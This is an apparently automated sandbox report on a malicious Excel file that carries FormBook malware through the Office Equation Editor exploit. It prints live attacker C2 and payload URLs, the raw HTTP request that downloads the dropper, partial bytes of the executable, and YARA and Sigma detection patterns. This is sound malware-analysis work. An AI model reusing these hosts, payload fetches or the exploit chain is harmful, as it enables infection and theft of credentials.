Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
TedarikciSiparisi_83613 .xlsx

Overview

General Information

Sample Name:TedarikciSiparisi_83613 .xlsx
Analysis ID:626598
MD5:650bb8e5fe570bde782be21c4e9f421c
SHA1:fd3ffa031546f1dfa7ed884689ca1e85941fca1e
SHA256:247838308fb5e12a258def82a63e3a752d1536d1771539d63cebcf283b8154b5
Tags:VelvetSweatshopxlsx
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for dropped file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Shellcode detected
Office equation editor drops PE file
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Contains functionality to download and execute PE files
Office Equation Editor has been started
Contains functionality to download and launch executables
Drops PE files to the user directory
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3032 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2584 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 2600 cmdline: "C:\Users\Public\vbc.exe" MD5: CE42FE431B88922AB59B6FD880CADCF6)
      • aspnet_compiler.exe (PID: 2336 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe MD5: 6D0C232D1F4CD357FD7C14ED6FABFA90)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.mentalnayaarifmetika.online/ocgr/"], "decoy": ["shiftmedicalstaffing.agency", "muktobangla.xyz", "attmleather.com", "modelahs.com", "clime.email", "yonatec.com", "mftie.com", "doxofcolor.com", "american-atlantic.net", "christineenergy.com", "fjqsdz.com", "nagpurmandarin.com", "hofwimmer.com", "gororidev.com", "china-eros.com", "xn--ekrt15fxyb2t2c.xn--czru2d", "dabsavy.com", "buggy4t.com", "souplant.com", "insurancewineappraisals.com", "012skz.xyz", "kincsemto.net", "zyaxious.website", "tellgalpy.com", "demetbatmaz.com", "wallacehills.com", "chambaultfleurs.com", "fairfieldgroupfw.com", "lotsimprovements.com", "dhslcy.com", "anotherdegen.com", "dearpennyyouradviceblogspot.com", "seekbeforefind.com", "societyalluredmcc.com", "climatecheckin.com", "candybox-eru.com", "tentacionescharlie.com", "exceedrigging.online", "skb-cabinet.com", "qhzhuhang.com", "ccav11.xyz", "sandstonehosting.com", "14offresimportantes.com", "xn--hj2bz6fwvan2be1g5tb.com", "embedded-electronic.com", "drsanaclinic.com", "ageofcryptos.com", "dreamonetnpasumo1.xyz", "engroconnect.net", "huvao.com", "denalicanninglids.com", "tootko.com", "edisson-bd.com", "myamazonloan.net", "dbcyebnveoyu.cloud", "floridacaterpillar.com", "travisjbogard.com", "dialoneconstruction.com", "tubesing.com", "gofilmwizards.com", "tahnforest.com", "salahov.info", "bimcellerviss.com", "garglimited.com"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x73130:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x734ba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7f1cd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x7ecb9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x7f2cf:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x7f447:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x73ed2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x7df34:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x74c4a:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x846bf:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x85762:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x815f1:$sqlite3step: 68 34 1C 7B E1
    • 0x81704:$sqlite3step: 68 34 1C 7B E1
    • 0x81620:$sqlite3text: 68 38 2A 90 C5
    • 0x81745:$sqlite3text: 68 38 2A 90 C5
    • 0x81633:$sqlite3blob: 68 53 D8 7F 8C
    • 0x8175b:$sqlite3blob: 68 53 D8 7F 8C

    Unpacked PEs

    SourceRuleDescriptionAuthorStrings
    2.3.EQNEDT32.EXE.6cecd8.0.raw.unpackAPT_NK_Methodology_Artificial_UserAgent_IE_Win7Detects hard-coded User-Agent string that has been present in several APT37 malware families.Steve Miller aka @stvemillertime
    • 0x1728:$a1: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
    • 0x1728:$a2: 4D 6F 7A 69 6C 6C 61 2F 35 2E 30 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31 3B 20 57 4F 57 36 34 3B 20 54 72 69 64 65 6E 74 2F 37 2E 30 3B 20 72 76 3A 31 31 2E 30 29 20 6C 69 6B 65 20 47 ...

    Sigma Signatures

    Exploits

    barindex
    Sigma detected: EQNEDT32.EXE connecting to internet
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 180.214.238.224, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2584, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171
    Sigma detected: File Dropped By EQNEDT32EXE
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2584, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe

    Snort Signatures

    No Snort rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Found malware configuration
    Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.mentalnayaarifmetika.online/ocgr/"], "decoy": ["shiftmedicalstaffing.agency", "muktobangla.xyz", "attmleather.com", "modelahs.com", "clime.email", "yonatec.com", "mftie.com", "doxofcolor.com", "american-atlantic.net", "christineenergy.com", "fjqsdz.com", "nagpurmandarin.com", "hofwimmer.com", "gororidev.com", "china-eros.com", "xn--ekrt15fxyb2t2c.xn--czru2d", "dabsavy.com", "buggy4t.com", "souplant.com", "insurancewineappraisals.com", "012skz.xyz", "kincsemto.net", "zyaxious.website", "tellgalpy.com", "demetbatmaz.com", "wallacehills.com", "chambaultfleurs.com", "fairfieldgroupfw.com", "lotsimprovements.com", "dhslcy.com", "anotherdegen.com", "dearpennyyouradviceblogspot.com", "seekbeforefind.com", "societyalluredmcc.com", "climatecheckin.com", "candybox-eru.com", "tentacionescharlie.com", "exceedrigging.online", "skb-cabinet.com", "qhzhuhang.com", "ccav11.xyz", "sandstonehosting.com", "14offresimportantes.com", "xn--hj2bz6fwvan2be1g5tb.com", "embedded-electronic.com", "drsanaclinic.com", "ageofcryptos.com", "dreamonetnpasumo1.xyz", "engroconnect.net", "huvao.com", "denalicanninglids.com", "tootko.com", "edisson-bd.com", "myamazonloan.net", "dbcyebnveoyu.cloud", "floridacaterpillar.com", "travisjbogard.com", "dialoneconstruction.com", "tubesing.com", "gofilmwizards.com", "tahnforest.com", "salahov.info", "bimcellerviss.com", "garglimited.com"]}
    Multi AV Scanner detection for submitted file
    Source: TedarikciSiparisi_83613 .xlsxReversingLabs: Detection: 34%
    Yara detected FormBook
    Source: Yara matchFile source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
    Antivirus detection for URL or domain
    Source: http://180.214.238.224/__cloud_for_file/vbc.exeAvira URL Cloud: Label: malware
    Source: www.mentalnayaarifmetika.online/ocgr/Avira URL Cloud: Label: malware
    Multi AV Scanner detection for dropped file
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeReversingLabs: Detection: 41%
    Source: C:\Users\Public\vbc.exeReversingLabs: Detection: 41%
    Machine Learning detection for dropped file
    Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected

    Exploits

    barindex
    Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
    Office equation editor establishes network connection
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 180.214.238.224 Port: 80
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
    Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdb source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, vbc.exe.2.dr, vbc[1].exe.2.dr
    Source: Binary string: THEDEVILISHERE.pdb source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: C:\Users\VICTOR\Downloads\Documents\CryptoObfuscator_Output\BMCXBMXCKSKS.pdbBSJB source: EQNEDT32.EXE, 00000002.00000003.953779390.000000000071E000.00000004.00000020.00020000.00000000.sdmp, vbc.exe.2.dr, vbc[1].exe.2.dr
    Source: Binary string: THEDEVILISHERE.pdbXqnq `q_CorDllMainmscoree.dll source: vbc.exe, 00000004.00000002.961584082.00000000004D0000.00000004.08000000.00040000.00000000.sdmp, vbc.exe, 00000004.00000002.961770763.00000000021E1000.00000004.00000800.00020000.00000000.sdmp

    Software Vulnerabilities

    barindex
    Shellcode detected
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036306A9 ShellExecuteExW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036305BD LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036306C7 ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03630648 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03630531 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0363054D URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03630692 ShellExecuteExW,ExitProcess,
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036305D7 URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 180.214.238.224:80
    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 180.214.238.224:80
    Source: excel.exeMemory has grown: Private usage: 4MB later: 63MB

    Networking

    barindex
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: www.mentalnayaarifmetika.online/ocgr/
    Source: Joe Sandbox ViewASN Name: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
    Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 May 2022 13:14:18 GMTServer: Apache/2.4.47 (Win64) OpenSSL/1.1.1k PHP/7.3.28Last-Modified: Fri, 13 May 2022 09:07:10 GMTETag: "38000-5dee0ffdad130"Accept-Ranges: bytesContent-Length: 229376Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ba 1f 7e 62 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 06 00 00 76 03 00 00 7c 03 00 00 00 00 00 ca 95 03 00 00 20 00 00 00 a0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 03 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 95 03 00 57 00 00 00 00 c0 03 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 03 00 0c 00 00 00 18 50 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d0 75 03 00 00 20 00 00 00 76 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 03 00 00 02 00 00 00 78 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 c8 05 00 00 00 c0 03 00 00 06 00 00 00 7a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ac 95 03 00 00 00 00 00 48 00 00 00 02 00 05 00 9c 50 03 00 d4 44 00 00 03 00 02 00 03 00 00 06 08 3d 00 00 10 13 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 00 28 0b 00 00 06 00 2a 00 00 00 03 30 09 00 07 00 00 00 00 00 00 00 02 28 3e 00 00 0a 2a 00 13 30 08 00 36 02 00 00 01 00 00 11 2b 07 26 16 28 11 00 00 06 1a 28 11 00 00 06 1e 28 11 00 00 06 3a e9 01 00 00 18 45 01 00 00 00 f6 ff ff ff 17 2d 06 d0 03 00 00 06 26 26 00 17 28 18 00 00 06 20 79 e7 07 00 28 18 00 00 06 25 26 20 7e e7 07 00 28 18 00 00 06 25 26 28 7f 00 00 06 20 81 e7 07 00 28 18 00 00 06 20 88 e7 07 00 28 18 00 00 06 28 80 00 00 06 20 8b e7 07 00 28 18 00 00 06 20 8e e7 07 00 28 18 00 00 06 28 80 00 00 06 20 91 e7 07 00 28 18 00 00 06 20 94 e7 07 00 28 18 00 00 06 25 26 28 80 00 00 06 20 97 e7 07 00 28 18 00 00 06 25 26 20 a0 e7 07 00 28 18 00 00 06 28 80 00 00 06 0a 1f 0c 28 11 00 00 06 28 06 00 00 06 3a 0d 01 00 00 1a 45 01 00 00 00 f6 ff ff ff 26 1f 10 28 11 00 00 06 1f 14 28 11 00 00 06 39 19 01 00 00 26 06 28 a4 00 00 06 0b 1f 18 28 11 00 00 06 28 05 0
    Source: global trafficHTTP traffic detected: GET /__cloud_for_file/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.238.224Connection: Keep-Alive
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036305BD LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: unknownTCP traffic detected without corresponding DNS query: 180.214.238.224
    Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
    Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000003.953845845.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exe
    Source: EQNEDT32.EXE, 00000002.00000003.953845845.00000000006F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exe95C:
    Source: EQNEDT32.EXE, 00000002.00000002.956128878.00000000006B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exeX
    Source: EQNEDT32.EXE, 00000002.00000002.956107839.0000000000696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exehhC:
    Source: EQNEDT32.EXE, 00000002.00000002.956562108.0000000003630000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exej
    Source: EQNEDT32.EXE, 00000002.00000003.953884228.000000000071C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://180.214.238.224/__cloud_for_file/vbc.exeu
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2DC1A5DE.emfJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036305BD LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,
    Source: global trafficHTTP traffic detected: GET /__cloud_for_file/vbc.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 180.214.238.224Connection: Keep-Alive

    E-Banking Fraud

    barindex
    Yara detected FormBook
    Source: Yara matchFile source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Office equation editor drops PE file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: 2.3.EQNEDT32.EXE.6cecd8.0.raw.unpack, type: UNPACKEDPEMatched rule: APT_NK_Methodology_Artificial_UserAgent_IE_Win7 hash1 = e63efbf8624a531bb435b7446dbbfc25, author = Steve Miller aka @stvemillertime, description = Detects hard-coded User-Agent string that has been present in several APT37 malware families., score =
    Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
    Source: 00000004.00000002.971324155.0000000003667000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
    Source: C:\Users\Public\vbc.exeCode function: 4_2_003358D3
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E24D0
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E5610
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E0678
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E1CE8
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E1CE7
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E65A0
    Source: C:\Users\Public\vbc.exeCode function: 4_2_002E0638
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and write
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and write
    Source: C:\Users\Public\vbc.exeMemory allocated: 77620000 page execute and read and write
    Source: C:\Users\Public\vbc.exeMemory allocated: 77740000 page execute and read and write
    Source: vbc.exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: vbc[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    Source: TedarikciSiparisi_83613 .xlsxReversingLabs: Detection: 34%
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$TedarikciSiparisi_83613 .xlsxJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR5F10.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLSX@6/18@0/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\Public\vbc.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
